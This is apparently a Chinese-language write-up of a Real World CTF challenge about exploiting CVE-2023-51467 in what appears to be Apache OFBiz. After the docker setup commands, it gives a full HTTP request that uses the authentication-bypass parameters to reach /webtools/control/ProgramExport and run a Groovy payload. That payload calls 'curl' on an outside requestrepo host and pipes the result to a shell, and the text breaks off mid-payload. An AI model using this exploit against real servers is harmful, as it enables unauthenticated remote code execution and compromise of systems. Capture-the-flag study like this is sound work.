Challenge01Be-a-Framework-HackerClone-and-Pwn, difficulty:Baby由于提供了附件,可以使用如下命令在本地启动一个服务docker build . -t rwctf:be-a-framework-hackerdocker run --rm -p 8443:8443 rwctf:be-a-framework-hacker这题主要考察的漏洞是CVE-2023-51467,通过?USERNAME=&PASSWORD=&requirePasswordChange=Y绕过鉴权。绕过鉴权之后可以执行 groovy 表达式, 这里使用的是 groovy 的 "".execute()语法来执行命令,绕过沙箱,具体 payload 如下POST /webtools/control/ProgramExport;/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1Host: 127.0.0.1:8443Accept-Encoding: gzip, deflate, brAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.123 Safari/537.36Connection: closeCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 81groovyProgram=["sh","-c","curl http://igr3yxom.requestrepo.com | ba
………………………………